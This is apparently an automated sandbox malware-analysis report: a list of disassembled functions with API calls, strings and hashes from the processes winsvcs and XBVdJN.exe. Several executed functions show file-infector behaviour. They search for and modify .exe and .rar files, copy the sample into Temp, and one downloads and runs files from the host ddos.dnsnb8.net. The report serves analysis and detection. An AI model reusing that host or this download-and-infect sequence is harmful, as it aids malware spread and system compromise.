_memcpy_s.LIBCMT ref: 0041512F

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: lstrlen$String_memcpy_s
String ID:
API String ID: 1108949412-0
Opcode ID: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
Instruction ID: dca89a99140dcdefd2515e70e36f7115f501ce712d998d2b27d11117e8ebcf95
Opcode Fuzzy Hash: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
Instruction Fuzzy Hash: 95219233305516AFD7209B15FC84FEBF7A8FBD5325F01456BF5048A210D636D89287A4

Function 00423E40 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0000000D,00000000,00411A70), ref: 00423DC1
RtlAllocateHeap.NTDLL(00000000), ref: 00423DC8

Part of subcall function 00423CD9: IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00423DEA
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00423E17

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: HeapVirtual$AllocAllocateFeatureFreePresentProcessProcessor
String ID:
API String ID: 2677508003-0
Opcode ID: 77e4cd4afd0e12484e5c990bfcac6811d7f4968818277ea316a279932f6fd003
Instruction ID: 33552fc1f294df3a2b2b113b899d939f80dfa8ae59bb1af21b4907c51dd0f451
Opcode Fuzzy Hash: 77e4cd4afd0e12484e5c990bfcac6811d7f4968818277ea316a279932f6fd003
Instruction Fuzzy Hash: 83016135304221A7EB311F6ABC09B673676EB85B02F950036F901E62A0CB6CCD41869C

Function 0042E1D8 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0042E1FE

Part of subcall function 0042E023: __fltout2.LIBCMT ref: 0042E04F

__cftog_l.LIBCMT ref: 0042E224
__cftoe_l.LIBCMT ref: 0042E256

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 778b9b8891b73742fb5b30d1044a06d15375a4591dad267e5ab082aca22325bf
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 8F11B03250005EFBCF125E86EC11CEE3F26BF18354B888856FE1958131C63AD9B2AB95

Function 0041718E Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 004171AE
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004171DA
DeleteDC.GDI32(?), ref: 004171E1
ReleaseDC.USER32(?,?), ref: 004171EE

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: ClientDeleteRectRelease
String ID:
API String ID: 2015589292-0
Opcode ID: e9618994a7d80b2474913c7f5678e94403ae5413d734db9b7ce1413f5d86d94e
Instruction ID: 6d328489f22ecbc7905818d7d901272752b0576e7d789662292b68c01cb6154c
Opcode Fuzzy Hash: e9618994a7d80b2474913c7f5678e94403ae5413d734db9b7ce1413f5d86d94e
Instruction Fuzzy Hash: E101FB72108204AFD711AF64DC08E6BBBF9FB8C320F01892DF99982261D771AC55CB65

Function 0042C34A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0042C356

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__getptd.LIBCMT ref: 0042C36D
__amsg_exit.LIBCMT ref: 0042C37B
__lock.LIBCMT ref: 0042C38B

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 1571e76f888f1696554205098581bf46176412833ac8a890af7b9e4240ba434f
Instruction ID: 1f90ef54278d78fe482f5476074c301cb1ab8b2a9e1e54857d71ca385ae67bc9
Opcode Fuzzy Hash: 1571e76f888f1696554205098581bf46176412833ac8a890af7b9e4240ba434f
Instruction Fuzzy Hash: 9AF06D32B40720DADB20EBB6B54674E33A0AB00724FD58A5FF800A7291CB6C5802DB5E

Function 0040FFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0041004A
_memcpy_s.LIBCMT ref: 00410066

Strings

list<T> too long, xrefs: 0040FFD8, 0041005F, 004100AE

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Exception@8Throw_memcpy_s
String ID: list<T> too long
API String ID: 4160651998-4027344264
Opcode ID: 77c742a53003cf5b4a42beaa5c9e332160a10667cf4b588755a10ceac9223e1b
Instruction ID: 87061816adbd77505f6fdf6fe6a369285cef3fe4ca098932c01a2f47f64931ca
Opcode Fuzzy Hash: 77c742a53003cf5b4a42beaa5c9e332160a10667cf4b588755a10ceac9223e1b
Instruction Fuzzy Hash: 4E21BF706483008FD710DE15C84076FBAE1BB98308F604E1EF5D557682C7B9DA898B8B

Function 00410AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00410B63
_memcpy_s.LIBCMT ref: 00410B7F

Strings

deque<T> too long, xrefs: 00410AE3, 00410B78, 00410BC7

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Exception@8Throw_memcpy_s
String ID: deque<T> too long
API String ID: 4160651998-309773918
Opcode ID: 5c6964cb9e37735a2a9789e4afb503501908d47ac08314a2fc1e04fe0174ab39
Instruction ID: 76a7e499c38a90962a59699183f8a2dce48751c19508e120701b83a76bc7192f
Opcode Fuzzy Hash: 5c6964cb9e37735a2a9789e4afb503501908d47ac08314a2fc1e04fe0174ab39
Instruction Fuzzy Hash: 3721B0707483409FD710DF55C84066FB7E1AB98308F504E0EF5D117682C7B8E9898B9B

Function 004291EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004291FA

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__getptd.LIBCMT ref: 00429208

Strings

csm, xrefs: 00429216

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 9cd0533e9162e1268b6a8c6e7b7f7a53d39f74832169e6eeb33821c90969245f
Instruction ID: 2cfbca0fe2cdbec7ade19a9cc29750f231db107eaf6571eb885056c95e9ab353
Opcode Fuzzy Hash: 9cd0533e9162e1268b6a8c6e7b7f7a53d39f74832169e6eeb33821c90969245f
Instruction Fuzzy Hash: 4601A234A01328EACF35DF62E44066EB3B9AF00311FD4486FE84096751CF389D91EB69

Analysis Process: XBVdJN.exePID: 6256, Parent PID: 6200COMMON

Execution Graph

Execution Coverage:	27.2%
Dynamic/Decrypted Code Coverage:	10.3%
Signature Coverage:	0%
Total number of Nodes:	302
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 006E29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 006E2A02
wsprintfA.USER32 ref: 006E2A1A
memset.MSVCRT ref: 006E2A44
lstrlen.KERNEL32(?), ref: 006E2A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 006E2A6C
strrchr.MSVCRT ref: 006E2A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 006E2A9F
lstrlen.KERNEL32(Documents and Settings), ref: 006E2AAE
memset.MSVCRT ref: 006E2AC6
memset.MSVCRT ref: 006E2ADA
FindFirstFileA.KERNELBASE(?,?), ref: 006E2AEF
memset.MSVCRT ref: 006E2B13
lstrcmpiA.KERNEL32(?,?), ref: 006E2B42
FindNextFileA.KERNELBASE(00000000,?,?,?,?), ref: 006E2B67
FindClose.KERNELBASE(00000000), ref: 006E2B6E

Strings

C:\, xrefs: 006E2A2F
Documents and Settings, xrefs: 006E2A8D, 006E2A92, 006E2A9A, 006E2AAD
%s*, xrefs: 006E2A14

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 672771061eaac4ed27b7828e7fd7d5003aac1ee6a7959da2ce106cd94b192d27
Instruction ID: 15ad6856b5ed8d9dc1e95ccd42e638c65fb8f8c43b061eb8a52f8b5558d6c11e
Opcode Fuzzy Hash: 672771061eaac4ed27b7828e7fd7d5003aac1ee6a7959da2ce106cd94b192d27
Instruction Fuzzy Hash: 184175B28053CAAFD720DFA1DC8DDEB77AEEB84715F040829F544C7211E634D6488BA6

Function 006E1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E1729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 006E174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 006E177C
__aulldiv.LIBCMT ref: 006E1796
__aulldiv.LIBCMT ref: 006E17A8

Strings

Time, xrefs: 006E173D, 006E1766
SOFTWARE\GTplus, xrefs: 006E1742, 006E176B
C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E1722

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-3754639035
Opcode ID: 1d6315d914312ad6dd544bd340197fd468a31d81a03c58ea1a62a05c401a12e5
Instruction ID: 9d8ae1be46d6af6323195dca3f353f2dab5d3e33249c5bf09559d9b29a7af4d6
Opcode Fuzzy Hash: 1d6315d914312ad6dd544bd340197fd468a31d81a03c58ea1a62a05c401a12e5
Instruction Fuzzy Hash: 09116371A01399BBDF109A95CCC9FEF7BBEEB45F14F208119FA10AB240D6719A449B60

Function 006E6076 Relevance: 11.1, APIs: 7, Instructions: 617
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 006E60BE
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 006E60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 006E6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006E61A5

Memory Dump Source

Source File: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: bff829b531e851c4e2227540a62c9f882b47fe2ff8e0d4c5556c75c9ca75f639
Instruction ID: b0f272fb2aab897f6260d37b9dff59cb204c38f4c9f16bfb7eb0672dacb88d6f
Opcode Fuzzy Hash: bff829b531e851c4e2227540a62c9f882b47fe2ff8e0d4c5556c75c9ca75f639
Instruction Fuzzy Hash: B71246B260A7C58FDB328F25CC45BEA3BB2EF22350F18459DE9858B293D674A901C751

Function 006E1E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNELBASE(?,00000080,?,006E32B0,00000164,006E2986,?), ref: 006E1EB9
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 006E1ECD
SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 006E1EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 006E1F07
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000400), ref: 006E1F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 006E201E
memset.MSVCRT ref: 006E20D8
memset.MSVCRT ref: 006E20EA
memcpy.MSVCRT ref: 006E222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E2238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E22C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E22CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E22DD
WriteFile.KERNEL32(000000FF,006E4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E22F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006E2322
UnmapViewOfFile.KERNEL32(?,?,006E32B0,00000164,006E2986,?), ref: 006E2340
CloseHandle.KERNEL32(?,?,006E32B0,00000164,006E2986,?), ref: 006E234E
CloseHandle.KERNEL32(000000FF,?,006E32B0,00000164,006E2986,?), ref: 006E2359

Strings

<@n, xrefs: 006E2290
m@n, xrefs: 006E1E8F, 006E225A
C@n, xrefs: 006E229E
5@n, xrefs: 006E2282
.@n, xrefs: 006E2274

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID: .@n$5@n$<@n$C@n$m@n
API String ID: 3043204753-1321908264
Opcode ID: 48a47b44bc508adba4057191fd3d14c7fdd88c3994e91125c0e395144db87970
Instruction ID: 0a770849c10bb49cccd4947d4b07c159c80870577e8ca4a1fed70afab47d1071
Opcode Fuzzy Hash: 48a47b44bc508adba4057191fd3d14c7fdd88c3994e91125c0e395144db87970
Instruction Fuzzy Hash: 5CF15A71901389EFCB20DFA5DC94AADBBB6FF08314F104529E519AB2A1D734AE81CF54

Function 006E274A Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 83
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 006E2766
memset.MSVCRT ref: 006E2774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 006E2787
wsprintfA.USER32 ref: 006E27AB

Part of subcall function 006E185B: GetSystemTimeAsFileTime.KERNEL32(006E1F92,00000000,?,00000000,?,?,?,006E1F92,?,00000000,00000002), ref: 006E1867
Part of subcall function 006E185B: srand.MSVCRT ref: 006E1878
Part of subcall function 006E185B: rand.MSVCRT ref: 006E1880
Part of subcall function 006E185B: srand.MSVCRT ref: 006E1890
Part of subcall function 006E185B: rand.MSVCRT ref: 006E1894

wsprintfA.USER32 ref: 006E27C6
CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\4e06417b.exe,00000000), ref: 006E27D4
wsprintfA.USER32 ref: 006E27F4

Part of subcall function 006E1973: PathFileExistsA.KERNELBASE(\Nn`Nn,00000000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E1992
Part of subcall function 006E1973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006E19BA
Part of subcall function 006E1973: Sleep.KERNEL32(00000064), ref: 006E19C6
Part of subcall function 006E1973: wsprintfA.USER32 ref: 006E19EC
Part of subcall function 006E1973: CopyFileA.KERNEL32(?,?,00000000), ref: 006E1A00
Part of subcall function 006E1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E1A1E
Part of subcall function 006E1973: GetFileSize.KERNEL32(?,00000000), ref: 006E1A2C
Part of subcall function 006E1973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 006E1A46
Part of subcall function 006E1973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 006E1A65

DeleteFileA.KERNEL32(?,?,006E4E54,006E4E58), ref: 006E281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,006E4E54,006E4E58), ref: 006E2832

Strings

C:\Users\user\AppData\Local\Temp\4e06417b.exe, xrefs: 006E27C0, 006E27C5, 006E27CC
C:\Windows\system32, xrefs: 006E27E3
\WinRAR\Rar.exe, xrefs: 006E2793
C:\Users\user\AppData\Local\Temp\, xrefs: 006E27B6
%s%s, xrefs: 006E27A5
%s%.8x.exe, xrefs: 006E27BB
%s\%s, xrefs: 006E27EE
c_31892.nls, xrefs: 006E27DE

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\4e06417b.exe$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-4044589814
Opcode ID: ad677d2139b14a203509f6f7a4a2b24136c5ba3775ea5bcdf050e65fd18ac8b4
Instruction ID: fd91bf1356e2b27690344a0f65632a81657163e44cd9f9a9c4a26703b65f2d44
Opcode Fuzzy Hash: ad677d2139b14a203509f6f7a4a2b24136c5ba3775ea5bcdf050e65fd18ac8b4
Instruction Fuzzy Hash: 6F2192B6D423AC7BDB10EBA69CCDFEB736EEB04704F0105A5B644E3141E6709F448AA0

Function 006E1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.KERNELBASE(\Nn`Nn,00000000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E1992
CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006E19BA
Sleep.KERNEL32(00000064), ref: 006E19C6
wsprintfA.USER32 ref: 006E19EC
CopyFileA.KERNEL32(?,?,00000000), ref: 006E1A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E1A1E
GetFileSize.KERNEL32(?,00000000), ref: 006E1A2C
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 006E1A46
ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 006E1A65
FindCloseChangeNotification.KERNELBASE(000000FF), ref: 006E1A90
DeleteFileA.KERNEL32(?), ref: 006E1AA7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 006E1AC1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 006E19DB
%s%.8X.data, xrefs: 006E19E6
C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E197C
\Nn`Nn, xrefs: 006E1980

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XBVdJN.exe$\Nn`Nn
API String ID: 2523042076-3222848328
Opcode ID: 020662e7637a4845918e2e021eb7eacf21bc5ca680238f62d0f511e124cc5799
Instruction ID: a7b7f8c9c32b3c9c9616cdf954c5e0395f81c4c4ddae8836e30d33e8f2425aff
Opcode Fuzzy Hash: 020662e7637a4845918e2e021eb7eacf21bc5ca680238f62d0f511e124cc5799
Instruction Fuzzy Hash: DB513C71902399AFCB209F99CCC8AFEBBBAEB06354F104579F515AB290C3309E40DB50

Function 006E28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 006E28D3
wsprintfA.USER32 ref: 006E28F7
memset.MSVCRT ref: 006E2925
wsprintfA.USER32 ref: 006E2940

Part of subcall function 006E29E2: memset.MSVCRT ref: 006E2A02
Part of subcall function 006E29E2: wsprintfA.USER32 ref: 006E2A1A
Part of subcall function 006E29E2: memset.MSVCRT ref: 006E2A44
Part of subcall function 006E29E2: lstrlen.KERNEL32(?), ref: 006E2A54
Part of subcall function 006E29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 006E2A6C
Part of subcall function 006E29E2: strrchr.MSVCRT ref: 006E2A7C
Part of subcall function 006E29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 006E2A9F
Part of subcall function 006E29E2: lstrlen.KERNEL32(Documents and Settings), ref: 006E2AAE
Part of subcall function 006E29E2: memset.MSVCRT ref: 006E2AC6
Part of subcall function 006E29E2: memset.MSVCRT ref: 006E2ADA
Part of subcall function 006E29E2: FindFirstFileA.KERNELBASE(?,?), ref: 006E2AEF
Part of subcall function 006E29E2: memset.MSVCRT ref: 006E2B13

strrchr.MSVCRT ref: 006E2959
lstrcmpiA.KERNEL32(00000001,exe), ref: 006E2974

Strings

exe, xrefs: 006E296D
%s\, xrefs: 006E293A
C:\Users\user\AppData\Local\Temp\, xrefs: 006E29B3
%s%s, xrefs: 006E28F1
rar, xrefs: 006E2988

Memory Dump Source

Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true

Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-1791786966
Opcode ID: 865cb58cf4ab9ddf3e6272a421d58898d2d617e80b7e0e661f6550e85ba624a0
Instruction ID: 0f1c2f1fbb8bb8dfd4a03f913c949615722f8925c9f7a404eb7dc6542386cc1b
Opcode Fuzzy Hash: 865cb58cf4ab9ddf3e6272a421d58898d2d617e80b7e0e661f6550e85ba624a0
Instruction Fuzzy Hash: 43313A7194139E7BDB209767DC99FDA336F9F10310F041456F581A7282E6B4DAC48F60

Function 006E1099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E185B: GetSystemTimeAsFileTime.KERNEL32(006E1F92,00000000,?,00000000,?,?,?,006E1F92,?,00000000,00000002), ref: 006E1867
Part of subcall function 006E185B: srand.MSVCRT ref: 006E1878
Part of subcall function 006E185B: rand.MSVCRT ref: 006E1880
Part of subcall function 006E185B: srand.MSVCRT ref: 006E1890
Part of subcall function 006E185B: rand.MSVCRT ref: 006E1894

WinExec.KERNEL32(?,00000005), ref: 006E10F1
lstrlen.KERNEL32(006E4748), ref: 006E10FA
wsprintfA.USER32 ref: 006E112A
wsprintfA.USER32 ref: 006E1143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 006E115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 006E1169
Sleep.KERNEL32 ref: 006E1179

Strings

http://%s:%d/%s/%s, xrefs: 006E10C2, 006E1141
ddos.dnsnb8.net, xrefs: 006E10C8, 006E10CF, 006E1140, 006E1168
C:\Users\user\AppData\Local\Temp\, xrefs: 006E1119
cj/, xrefs: 006E1135
%s%.8X.exe, xrefs: 006E1124
HGn, xrefs: 006E112C

Memory Dump Source

